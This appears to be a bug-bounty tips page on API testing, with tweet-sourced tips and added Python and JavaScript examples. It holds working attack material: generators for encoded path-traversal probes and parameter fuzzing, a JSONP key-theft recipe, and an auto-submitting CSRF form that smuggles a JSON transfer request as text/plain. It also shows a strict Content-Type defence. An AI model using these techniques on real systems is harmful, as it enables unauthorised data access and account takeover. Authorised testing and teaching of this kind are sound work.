# API

* [BugBountyTip: If you are playing with an `API ENDPOINT`, always try to send an `INVALID CONTENT TYPE`; you may end up getting hidden endpoints in the `RESPONSE`](https://twitter.com/XSaadAhmedX/status/1145052664046206976)
* [Good start of the month: /api/something - 400, /api/something?filter=all - 200. Found in a four-year-old private program with almost 1000 resolved reports. Bugs are still there, don't get intimidated by how many have searched on that program.](https://twitter.com/bogdantcaciuc7/status/1234667685343948803)
* <https://medium.com/bugbountywriteup/31-tips-api-security-pentesting-480b5998b765>
* [Login to program -> Param Miner enabled, found a JSONP callback on every API call, content type converted to JavaScript -> made a quick HTML page to receive the function callback -> stole the account's generated API keys and secrets -> fastest P1/P2 of the week.](https://twitter.com/MasterSEC_AR/status/1262969981098229761)
* If you are testing a JSON endpoint, always try to change one letter in the parameter names to make them invalid. I had quite a few cases where the server threw back an error with all of the accepted parameters.
* [Leak PII-sensitive API user data with URL path permutations: `/api/users/user@email.com` -> `/api/users/..%2Fuser@email.com` or `/api/account/123/` -> `/api/account/..%2F..%2F123`. Enjoy! #bugbountyTip #bugbounty @bugbounty\_world #BtyPlz #infosec](https://twitter.com/akita_zen/status/1131652331471347712) [![Image](https://pbs.twimg.com/media/D7Rvs9TWsAAq9Un?format=jpg\&name=medium)](https://twitter.com/akita_zen/status/1131652331471347712/photo/1)
* [When testing OpenID Connect or OAuth 2.0 and you got the client\_id: Always consider/check the same authentication request as the UserInfo endpoint to retrieve PII information by adding the "claims" parameter! Developers so often use the same authentication URI as UserInfo](https://twitter.com/ApiDiary/status/1426218707756457995?s=20)

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-Mj7oPLWoKjAV8ExUUgb%2F-Mj7q1fNgwBQj_TAP7fR%2Fimage.png?alt=media\&token=b5b653f9-1b0a-42fc-8940-8a3af09057d9)
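The invalid-content-type, mutated-parameter-name and path-permutation tips above all come down to generating a batch of deliberately wrong requests and mining whatever verbose error comes back. The helpers below are an added example, not code from any of the tweets; they run offline on a constructed error body, constructed parameter names and the two paths quoted in the tips, and produce the probe lists you would hand to Burp or an HTTP client against a real target.

```python
"""Added example (not from any of the tweets above): offline helpers that
generate the probes the three tips describe and mine verbose error bodies for
what they leak. The sample error body, the parameter names and the paths are
constructed for illustration; feed real responses in when testing a target."""
import posixpath
import re
from urllib.parse import unquote

# Tip 1: Content-Type values to rotate through on a JSON endpoint. The
# interesting signal is a verbose 4xx/5xx body rather than a generic rejection.
CONTENT_TYPE_PROBES = [
    "application/xml",
    "text/plain",
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "application/json; charset=invalid",
    "invalid/content-type",
]

# Constructed sample of the kind of error body tips 1 and 2 hope to provoke.
SAMPLE_ERROR_BODY = (
    '{"status":400,"message":"Unknown parameter \'useId\'. Accepted parameters: '
    'user_id, email, role, is_admin. See /api/v2/users/export and '
    '/api/internal/debug for details."}'
)

PARAM_LIST_RE = re.compile(r"[Aa]ccepted parameters?:\s*([A-Za-z0-9_,\s]+)")
ENDPOINT_RE = re.compile(r"(?<![\w/])/api/[A-Za-z0-9_./-]+")


def extract_hints(body: str) -> dict:
    """Pull accepted parameter names and any API paths out of an error body."""
    params = []
    match = PARAM_LIST_RE.search(body)
    if match:
        params = [p.strip() for p in match.group(1).split(",") if p.strip()]
    endpoints = sorted(set(ENDPOINT_RE.findall(body)))
    return {"params": params, "endpoints": endpoints}


def mutate_param_names(payload: dict) -> list:
    """Tip 2: one copy of the payload per key, with that key changed by a single
    character (last letter dropped, first letter case-flipped, one letter added)."""
    mutated_payloads = []
    for key in payload:
        if not key:
            continue
        for variant in (key[:-1], key[0].swapcase() + key[1:], key + "x"):
            if variant and variant != key:
                mutated = dict(payload)
                mutated[variant] = mutated.pop(key)
                mutated_payloads.append(mutated)
    return mutated_payloads


# Tip 3: encoded dot-dot-slash tokens. Proxies, WAFs and frameworks decode and
# normalise these differently, and that inconsistency is what is being probed.
TRAVERSAL_TOKENS = ["..%2F", "..%2f", "..%252F", "%2e%2e%2F", "..;/"]


def path_permutations(path: str, max_depth: int = 2) -> list:
    """Insert traversal tokens at every segment boundary, one to max_depth deep:
    /api/users/user@email.com -> /api/users/..%2Fuser@email.com, and
    /api/account/123/ -> /api/account/..%2F..%2F123."""
    segments = [s for s in path.split("/") if s]
    permutations = []
    for i in range(1, len(segments)):
        head, tail = "/".join(segments[:i]), "/".join(segments[i:])
        for token in TRAVERSAL_TOKENS:
            for depth in range(1, max_depth + 1):
                permutations.append(f"/{head}/{token * depth}{tail}")
    return permutations


def backend_view(path: str) -> str:
    """The route a layer that URL-decodes once and then normalises would see.
    Where this differs from the literal path, an access rule keyed on the literal
    string (a proxy ACL, a WAF pattern) and the backend are no longer looking at
    the same resource."""
    return posixpath.normpath(unquote(path))


if __name__ == "__main__":
    print(extract_hints(SAMPLE_ERROR_BODY))
    for mutated in mutate_param_names({"user_id": 7, "email": "a@b.c"}):
        print(mutated)
    for candidate in path_permutations("/api/users/user@email.com"):
        print(f"{candidate:45} -> {backend_view(candidate)}")
```

Compare the literal candidate with `backend_view(candidate)` when you triage results: a candidate whose decoded-and-normalised form lands somewhere other than the literal string (`..%2F` collapses a segment, `..%252F` survives one decoding round and collapses on the next) is the one where a front-end rule and the backend can disagree.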

* [Perhaps you're attacking an API with a solid CORS configuration, and your form-based CSRF attack using "text/plain" is failing because the server replies that it expects "application/json". Try this trick... 1/3 #bugbountytips](https://twitter.com/jub0bs/status/1432025054108430346?s=20)
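The baseline that tweet starts from, as an added example that is not jub0bs's code (the rest of his thread is not reproduced on this page, so the trick itself is not shown here): a cross-site form submission is a navigation, not a CORS request, so a tight CORS policy never sees it, but the body goes out as `text/plain`. The attacker's problem is making that body parse as JSON; the server's defence is the strict Content-Type check that produced the "expects application/json" reply. The endpoint URL and field names below are hypothetical, and the demo payload is constructed.

```javascript
// Added example, not code from jub0bs's thread. It shows the baseline the
// tweet starts from: a form posts cross-origin with the victim's cookies and a
// text/plain body that is crafted to be valid JSON, and a strict server rejects
// it on Content-Type alone. Endpoint and field names are hypothetical.

// Attacker side: turn a JSON document into one <input name="..." value="...">
// pair. The browser's text/plain form encoding is `${name}=${value}\r\n` per
// field, so we add a throwaway key whose value is "=" and split the JSON at
// that '=', which the browser then puts back when it encodes the form.
function jsonToTextPlainField(obj) {
  const json = JSON.stringify({ ...obj, __pad: "=" });
  const marker = '"__pad":"="';
  const idx = json.indexOf(marker);
  if (idx < 0) throw new Error("pad marker not found");
  const eq = idx + marker.indexOf("="); // index of the '=' the browser re-inserts
  return { name: json.slice(0, eq), value: json.slice(eq + 1) };
}

// What the browser sends for enctype="text/plain" (HTML spec text/plain
// encoding algorithm): name=value followed by CRLF, per field.
function browserTextPlainBody(fields) {
  return fields.map(({ name, value }) => `${name}=${value}\r\n`).join("");
}

// The auto-submitting page an attacker would host.
function csrfFormHtml(action, field) {
  const attr = (s) => s.replace(/&/g, "&amp;").replace(/"/g, "&quot;");
  return (
    `<form id="f" method="POST" action="${action}" enctype="text/plain">` +
    `<input type="hidden" name="${attr(field.name)}" value="${attr(field.value)}">` +
    `</form><script>document.getElementById("f").submit();</script>`
  );
}

// Server side. The lax variant parses whatever arrives and is what the form
// above exploits; the strict variant is the behaviour the tweet ran into
// ("expects application/json"). Because application/json is not a
// CORS-safelisted media type, a strict check forces the attacker into a
// request the browser will preflight, which is where the CORS policy bites.
function parseJsonBody(contentType, body, { strict }) {
  const mediaType = (contentType || "").split(";")[0].trim().toLowerCase();
  if (strict && mediaType !== "application/json") {
    return { ok: false, status: 415, error: `expected application/json, got ${mediaType || "none"}` };
  }
  try {
    return { ok: true, status: 200, data: JSON.parse(body) };
  } catch {
    return { ok: false, status: 400, error: "invalid JSON" };
  }
}

// Constructed demo payload against a hypothetical endpoint.
const demoPayload = { action: "transfer", to: "attacker", amount: 1000 };
const demoField = jsonToTextPlainField(demoPayload);
const demoBody = browserTextPlainBody([demoField]);
console.log(csrfFormHtml("https://api.example/api/transfer", demoField));
console.log("lax server:   ", parseJsonBody("text/plain", demoBody, { strict: false }));
console.log("strict server:", parseJsonBody("text/plain", demoBody, { strict: true }));
```

Run it with Node to see the form the attacker would serve and the two server verdicts side by side. Note that the strict check is only a defence if the endpoint also rejects missing or mismatched Content-Type values; matching on the media type after stripping parameters, as above, is what keeps `application/json; charset=utf-8` working for legitimate clients.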
